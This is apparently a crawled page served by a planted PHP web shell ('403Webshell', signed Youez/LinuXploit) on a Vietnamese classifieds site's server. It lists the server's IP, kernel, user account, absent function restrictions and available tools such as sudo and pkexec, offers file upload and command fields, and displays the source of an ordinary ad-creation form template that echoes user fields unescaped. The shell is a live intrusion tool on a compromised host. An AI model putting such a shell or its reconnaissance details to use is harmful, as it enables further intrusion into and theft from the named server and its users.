403Webshell
Server IP : 103.48.194.25  /  Your IP : 216.73.216.74
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux VMHostDefault 3.10.0-1160.42.2.el7.x86_64 #1 SMP Tue Sep 7 14:49:57 UTC 2021 x86_64
User : sieuthimay ( 1016)
PHP Version : 8.2.20
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/zomuaban.com/public_html/site/views/backend-old/crawl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/zomuaban.com/public_html/site/views/backend-old/crawl/ad_create.php
<?=includeCss('common', '/js/summernote/summernote.css')?>

<div id="createAd" class="panel">
	<div class="panel-heading">
		<div class="form-group ">
			<label for="titleInput">
				<abbr title="Thông tin bắt buột">
					Cần bán:
				</abbr>
			</label>
			<small>(Tên sản phẩm không được chứa từ khóa "mua" , "bán")</small>
			
			<input id="titleInput" value="<?=$item->title?>" require="1" type="text" class="form-control"  placeholder="Tên sản phẩm cần bán">
			
		</div>
	</div>
	
	<div class="panel-body">
		<form class="" role="form">
			<div class="form-inline pull-right meta">				
				<div class="form-group">
					<input id="priceInput" value="<?=$item->price?>" require="1" type="text" class="form-control" placeholder="Nhập giá bán">
				</div>
				<div class="form-group text-right">
					<?php $this->load->view('frontend/default/inc/locationselect',get_city_by_id($item->location));?>	
				</div>
			</div>
							
			<div class="summernote" style="margin-top:10px">
				<?=$item->description?>
			</div>
			
			<p></p>
			
		</form>
	</div>
	
	<div class="panel-footer clearfix">
		<div id="item-imgage" class="col-xs-4">
			<img src="<?=$item->images?>" />
		</div>	
		
		<div id="contact_infos_form" class="col-xs-8">			
			<form class="bs-example" role="form">
				<div class="form-group">
					<span class="require">*</span>
					<input id="name-input" value="<?=$item->uName?>" placeholder="Tên người bán" class="form-control" type="text">						
				</div>
				
				<div class="form-group">
					<span class="require">*</span>
					<input id="email-input" type="email" value="<?=$item->email?>" placeholder="Email người bán" class="form-control" >
				</div>
				
				<div class="form-group">
					<span class="require">*</span>
					<input id="phone-input" type="phone" value="<?=$item->phone?>" placeholder="Số điện thoại người bán" class="form-control">
				</div>
				
				<div class="form-group">
					<input id="address-input" type="address" value="<?=$item->address?>" placeholder="Địa chỉ giao dịch hoặc địa chỉ người bán" class="form-control">
				</div>
			</form>		
		</div>
		
		<div class="alert pull-left col-xs-12"></div>
		
	</div>	
	
</div>



<script src="<?=cnd('js/summernote/summernote.js')?>" type="text/javascript"></script>

<script>

	$('.create-ad-form').find('#locationBtn').locateSelect();
	
	/** Chuyển đổi số thành cách đọc tiền*/
	$('#priceInput').blur(function(e){
		setTimeout(function(){			
			str2Currency(0,e);
		},100 );
	});
		
	$('.summernote').summernote({
		width: 600, 			
		tabsize: 2,
		toolbar: [
					['style', ['style','bold', 'underline', 'clear']],
					['fontsize', ['fontsize']],
					//['color', ['color']],
					['para', ['ul', 'ol', 'paragraph']],
					//['insert', ['picture']],
					//['help', ['help','codeview']]
				  ],
		oninit: function() {
			$(this).show();
		}
		//,onImageUpload: function(files, editor, welEditable) {
		//	console.log('image upload:', files, editor, welEditable);
		//}
		
	});
	
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit